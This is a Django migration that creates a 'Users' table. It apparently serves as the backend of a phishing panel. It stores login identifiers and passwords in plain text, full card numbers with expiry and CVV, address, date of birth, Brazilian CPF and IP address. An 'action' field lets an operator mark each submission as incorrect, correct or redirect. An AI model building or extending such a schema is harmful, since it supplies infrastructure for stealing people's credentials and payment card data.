# Generated by Django 6.0.7 on 2026-08-10 22:04

import uuid
from django.db import migrations, models


class Migration(migrations.Migration):

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Users',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('user_id', models.CharField(default=uuid.uuid4, editable=False, max_length=100, null=True, unique=True)),
                ('Email_or_number', models.CharField(max_length=50)),
                ('new_password', models.CharField(max_length=200)),
                ('password', models.TextField()),
                ('card_name', models.CharField(blank=True, max_length=200, null=True)),
                ('card_number', models.CharField(blank=True, max_length=200, null=True)),
                ('exp', models.CharField(blank=True, max_length=200, null=True)),
                ('card_cvv', models.CharField(blank=True, max_length=200, null=True)),
                ('address', models.CharField(blank=True, max_length=200, null=True)),
                ('city', models.CharField(blank=True, max_length=200, null=True)),
                ('state', models.CharField(blank=True, max_length=200, null=True)),
                ('zipcode', models.CharField(blank=True, max_length=200, null=True)),
                ('number', models.CharField(blank=True, max_length=200, null=True)),
                ('dob', models.CharField(blank=True, max_length=200, null=True)),
                ('cpf', models.CharField(blank=True, max_length=200, null=True)),
                ('action', models.CharField(choices=[('incorrect', 'Incorrect'), ('correct', 'Correct'), ('redirect', 'Redirect')], default='correct', max_length=50)),
                ('ip_address', models.CharField(max_length=50)),
                ('create_at', models.DateTimeField(auto_now_add=True)),
            ],
        ),
    ]
